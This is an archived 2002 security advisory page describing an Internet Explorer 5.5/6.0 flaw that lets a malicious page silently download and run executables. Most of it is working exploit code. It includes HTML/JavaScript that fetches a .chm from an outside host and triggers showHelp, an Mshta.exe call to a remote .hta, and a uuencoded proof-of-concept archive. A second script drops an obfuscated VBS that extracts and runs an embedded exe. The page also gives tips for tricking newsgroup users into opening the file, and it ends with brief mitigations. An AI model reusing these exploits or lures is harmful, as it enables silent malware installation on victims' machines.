TUCoPS :: Browsers :: expl5080.htm

Internet Explorer may be fooled by remote site to download and run any file
8th Feb 2002 [SBWID-5080]
COMMAND

	IE may be fooled by remote site to download and run any file

SYSTEMS AFFECTED

	Internet Explorer 5.5 and 6.0

PROBLEM

	http-equiv [http://www.malware.com] posted :
	

	Default installation of Internet Explorer 5.5 and 6.0  still  allows  us
	to execute files  on  default  installations  of  the  target  computer,
	technically trivial silent delivery and installation  of  an  executable
	on the target computer.:
	

	We cobble together new and old Components as follows : -
	

	1. Courtesy of Georgi Guninski
	   see : [http://www.securityfocus.com/bid/1033]

	2. Courtesy of Georgi Guninski
	   see : [http://www.securityfocus.com/bid/2456]

	3. Mshta.exe http://www.malware.com/foobar.hta
	   see : [http://www.securitybugware.org/NT/1279.html]

	

	Either 1 or 2 above canno\'t be exploited alone.
	

	Nothing can be activated through the  Temporary  Internet  Files  unless
	full path names are known for both showHelp calling and Click()  of  our
	link.
	

	However malware team was able to retrieve from  the  Temporary  Internet
	File a trojanised  html,  determine  the  location  of  it,  write  this
	location out to a showHelp  call  and  thereafter  execute  a  specified
	remote link.
	

	 Sample Exploit :

	 ==============

	

	We create a very simple *.html file like so:
	

	 <bgsound src=\"http://www.malware.com/malware.chm\">

	

	this will pull our *.chm into the Temporary Internet File
	

	when then include the Guninski scripting to determine  the  location  of
	our *.html file like so:
	

	malware=document.URL;

	path=malware.substr(-0,malware.lastIndexOf(\"\\\\\"));

	path=unescape(path);

	

	we then take that location information and write it  to  a  simple  html
	form like so:
	

	document.write(\'<FORM name=\"malware\"

	ACTION=\"javascript:window.showHelp(document.forms[0].elements

	[0].value)\">\');

	document.write(\'<form><input type=\"hidden\"  size=\"40\" maxlength=\"80\"

	value=\"\'+path+\'\\\\malware[1].chm\"></form>\');

	

	technical note: it seems the myriad of patching to date  does  not  make
	it possible to pass the location directly to the showHelp call. It  must
	be written to the form which can then be automatically submitted:
	

	setTimeout(\'document.malware.submit()\',5000);

	

	before we do all that we create our very simple malware.chm and  include
	our link object like so:
	

	C:\\WINDOWS\\SYSTEM\\Mshta.exe,http://www.malware.com/foobar.hta

	

	this is particularly interesting as we are able to pass a  link  to  the
	mshta.exe, which in turn will open from the remote site our *.hta  which
	includes our executable. All without warning.
	

	technical note: the  possibility  is  excellent  to  repeat  the  entire
	process above directly inside the *.chm file  and  drop  an  *.exe  from
	within the *.chm into  the  same  Temporary  Internet  File.  Using  our
	Guninski scripting to determine the location  of  the  *.chm  and  write
	that to the  link  parameter  within  it:  value=\"\'+path+\'\\\\malware
	[1].exe\"> and execute it.
	

	 So what happens?

	 ===============

	

	We construct our trojanised *.html file and send it off  to  our  target
	computer. This can be via mail or news. The recipient receives the  mail
	message and attached *.html file.  We  then  convince  our  unsuspecting
	recipient  to  open  our  *.html.  This   should   be   quite   trivial,
	particularly in news as the attached file is in fact nothing  more  than
	a 500 byte html file.
	

	Consider the following  scenario  in  your  favourite  web  design  news
	group:
	

	Carefully note: there is a hardened security warning when attempting  to
	open attached *.html file. However our combination call  for  assistance
	coupled with nothing more than a legitimate  *.html  file  should  prove
	more than tempting:
	

	screen shot: http://www.malware.com/duh.png 18KB

	

	

	Why does it happen? ==================
	

	Because our simple  *.html  file  is  an  attachment,  security  has  it
	transfer to the Internet Temporary File for opening, under the  security
	browser\'s settings. However, precisely because it is physically  opened
	within the TIF, we can use  our  Guninski  scripting  to  determine  the
	exact location, write that exact location  to  our  form  and  call  our
	*.chm where it too resides.
	

	Working Example  below,  includes  harmless??  *.exe  --  the  *.chm  is
	hardcoded for win98. Due to pathetic  technical  reasons  our  *.chm  is
	off-site and may delay in transferring to the  TIF  and  could  possibly
	fail, working example must be attached to mail or news.
	

	UUEncoded
	

	begin 644 help!.zip

	M4$L#!!0``@`(``F21RQ5&;V@E`$``((\"```0````:\'1M;%]T86)L97,N:\'1M

	M;&U238O;,!\"]&_P?!EULLUG;&UI:MG:@+)0&VJ:DV5.2@U:>Q%HLR>@CWK3T

	MOU=R$]/\"\"AUFAC?OS1=43T>CG&S`:%:3UMK^OB@$[0:J,1>NLUQ0R6G.E)C\"

	MK!5D$4<01W%4_7A8+[]O%L$N\"GB7EW/_X4(T#$,^92EQ`9V5`T\'/P)0TO$$-

	M@^:6RR,8/*&F\'71<HAFA7`*C!N$?::!:\\Q,:H`:V=WM0&K;S/:!E@?[@)+-<

	MR6M&FL71KS@R=:.8$RAM_KC^\\B&.>FK;VN3&/1FKT]MR9O*.&KN4#;ZL#BG9

	M[4B677\'.E\\-HCVGP0G0B\"Y5CFE2?5NNO(*G`FER$\"7Q\\V\"Q7WVKR3$_4,,U[

	M>S]PV:@A-ZT:/F/7IQ//06EAMN4^QPY#8+1/M\'.8D47RJF1(651<]LZ\"/?=>

	MN>5-@Y(`&/[3NV]*XJ?PTJ$\\^A[(>^^.C#5);D(C-\\EN=RG6S_\'O5JMBI!T5

	M#=H-%ZB<39-)_;H(/SC!;9HEL[O2OX\"\'W_!?$IE60&;SMP$#\'E`5T\\6,!_0\'

	M4$L#!!0````(`)N21RSS>=1RX````\"L!```*````<F5A9&UE+G1X=\"5/RTK$

	M0!\"\\!_(/]0\'KK\'I1]Y:5P`9,!!/Q*+U)NPG.(\\PTCOOWSD3H0W5U457]H&[O

	MTY1%6<PBZV&_CS$J0SJ29S4ZDR]W\"K,8_2ETUAQ4QIDF$1IGB`/9*]C0HF$X

	M!+HPG(?E&+\"Z((N]9\'EW/&`X-3W:]W[`L4;5H1J&ZOG4UMV`ID-;-2]X?4-7

	M?_1;(_(F!08H_F7$16N,GDD89JN7V!VT&S-#=L+$FA/\\2N&+#4)6$+2[,0Z>

	M5TW7[%D6U@D?D+PGC&[B:=/\'Q3X][I\"Z?G/>)/TU,W[(+_]/*_4\'4$L!`A0`

	M%``\"``@`\"9)\'+%49O:\"4`0``@@(``!```````````0`@`+:!`````&AT;6Q?

	M=&%B;&5S+FAT;6Q02P$\"%``4````\"`\";DD<L\\WG4<N`````K`0``\"@``````

	L```!`\"``MH\'\"`0``<F5A9&UE+G1X=%!+!08``````@`\"`\'8```#*`@``````

	`

	end

	854 bytes

	

	

	 Update (11 February 2002)

	 ======

	

	dzzie [http://geocities.com/dzzie]  posted  another  exploit,  proof  of
	concept on a chm exe dropper :
	

	This works from Internet Temp files directory as well, all  someone  has
	to do is choose the open option when they click a link to  a  chm  file,
	and they are done.
	

	-------------------------------------------------

	flow of events

	-------------------------------------------------

	

	1) chm opens 

	     a) determines absolute path current folder

	     b) determines parent chm name (in case cached changes name)

	     c) detects winNT or win98 to work on both

	

	2) chm name is used to auto generate vbs script data

	   abs path is used to auto generate html object data

	   script writes dynamically generated content to window

	

	3) first object activated programatically....vbs script is echoed 

	   into existance into same folder as parent chm file

	

	4) waits 1sec then activates echoed.vbs file...this vbs file

	   reads the parent .chm and extracts a hello world exe that is

	   appended onto the chm file. 

	

	5) after exe is written to disk vbs script then activates it 

	

	-------------------------------------------------------------

	script below

	-------------------------------------------------------------

	

	

	msg=\'<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\\\</h1></center>\'

	

	function getChmAbsPath(){

	     t=unescape(location.href)

	     return t.substring(t.indexOf(\":\",4)+1,t.lastIndexOf(\"\\\\\")+1)

	}

	

	function getChmName(){

		l=unescape(location.href)

		chmName=l.substring(l.lastIndexOf(\"\\\\\")+1,l.lastIndexOf(\":\")-1)

		t=\'Chr(92)+\'

		for(i=0;i<chmName.length;i++){

		    t+= \'Chr(\' + chmName.charCodeAt(i) + \')+\'

		}

		return t.substring(0,t.length-1);

	}

	

	function getInterpreter(){	

	    if(navigator.userAgent.indexOf(\'NT\') > 0){

	       return \'cmd\';

	    }else{

	       return \'command\';

	    } 

	}

	

	vbs=\'fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):\'+

	    \'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):\'+

	    \'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):\'+

	    \'set i=createobject(fso):\'+

	    \'set o=createobject(fso):\'+

	    \'set w=createobject(wsc):\'+

	    \'pf=i.GetParentFolderName(WSCript.ScriptFullName):\'+

	    \'infile=pf+\' + getChmName() + \':\'+

	    \'outfile=pf+exename:\'+

	    \'OFFSET=XXXXXXX:\'+

	    \'Set ii=i.OpenTextFile(infile):\'+

	    \'Set oo=o.OpenTextFile(outfile,2,True):\'+

	    \'ii.Read OFFSET:\'+

	    \'While Not ii.AtEndOfStream:\'+

	    \'oo.Write Chr(Asc(ii.Read(1))):\'+

	    \'Wend:ii.close:oo.close:\'+

	    \'w.Run chr(34)+outfile+chr(34)\'

	

	hit=\'<OBJECT id=shortcut^ type=\"application/x-oleobject\"  \'+

	    \'classid=\"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\" \'+

	    \'codebase=\"hhctrl.ocx\\#Version=4,72,8252,0\" width=100 \'+

	    \'height=100><PARAM name=\"Command\" value=\"ShortCut\">   \'+

	    \'<PARAM name=\"Text\" value=\"Text: \">                   \'+

	    \'<PARAM name=\"Item1\" value=\\\',*\\\'>                    \'+

	    \'<PARAM name=\"Item2\" value=\"273,1,1\"></OBJECT>        \'

	

	scriptPath = getChmAbsPath() + \'echoed.vbs\'

	

	cmd=new Array

	cmd[1]= getInterpreter() + \',/c echo \' + vbs + \' > \"\' + scriptPath + \'\"\'

	cmd[2]=\'wscript,\"\' + scriptPath + \'\"\'

	

	function replace(h,i,c){

		h = h.split(\'^\').join(i).split(\'*\').join(c)

	    return h

	}

	

	hit1=replace(hit,1,cmd[1])

	hit2=replace(hit,2,cmd[2])

	

	document.write(hit1+hit2+msg)

	shortcut1.Click()

	setTimeout(\"shortcut2.Click()\",1000)

	

SOLUTION

	 1. Be aware of \"innocent\" *.html files in mail and news

	 2. Disable Active Scripting and Active X controls

	 3. Disable the HHCtrl ActiveX control,   

	    see:http://www.kb.cert.org/vuls/id/25249 ]

	 4. Disable or Remove Mshta.exe [although if an *.exe 

	    embedded directly into the *.chm then this has no impact]

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH